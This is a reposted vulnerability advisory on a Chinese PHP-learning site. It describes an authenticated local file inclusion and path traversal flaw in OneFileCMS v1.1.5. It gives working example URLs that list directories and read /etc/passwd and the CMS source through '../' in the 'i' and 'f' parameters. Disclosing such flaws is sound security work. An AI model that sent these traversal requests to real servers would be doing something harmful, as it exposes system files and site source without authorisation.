来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability作者: mr.pr0n (@_pr0n_)主页: http://ghostinthelab.wordpress.com/ - http://s3cure.gr下载地址: https://github.com/rocktronica/O......
|
标题: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
作者: mr.pr0n (@_pr0n_) 主页: http://ghostinthelab.wordpress.com/ - http://s3cure.gr 下载地址: https://github.com/rocktronica/OneFileCMS 影响版本: OneFileCMS v.1.1.5 测试平台: Linux Fedora 14 =============== 概述 =============== OneFileCMS是这么个东西. It's a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs. ======================================================= [!] 所有缺陷需要认证. [!] ======================================================= Directory Listing, using the "i" parameter: http://TARGET/onefilecms/onefilecms.php?i=../../../../ Read local files, using the "f" parameter: http://www.2cto.com /onefilecms/onefilecms.php?f=../../../../etc/passwd http://TARGET/onefilecms/onefilecms.php?f=../../../../var/www/html/onefilecms/onefilecms.php -- http://ghostinthelab.wordpress.com |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
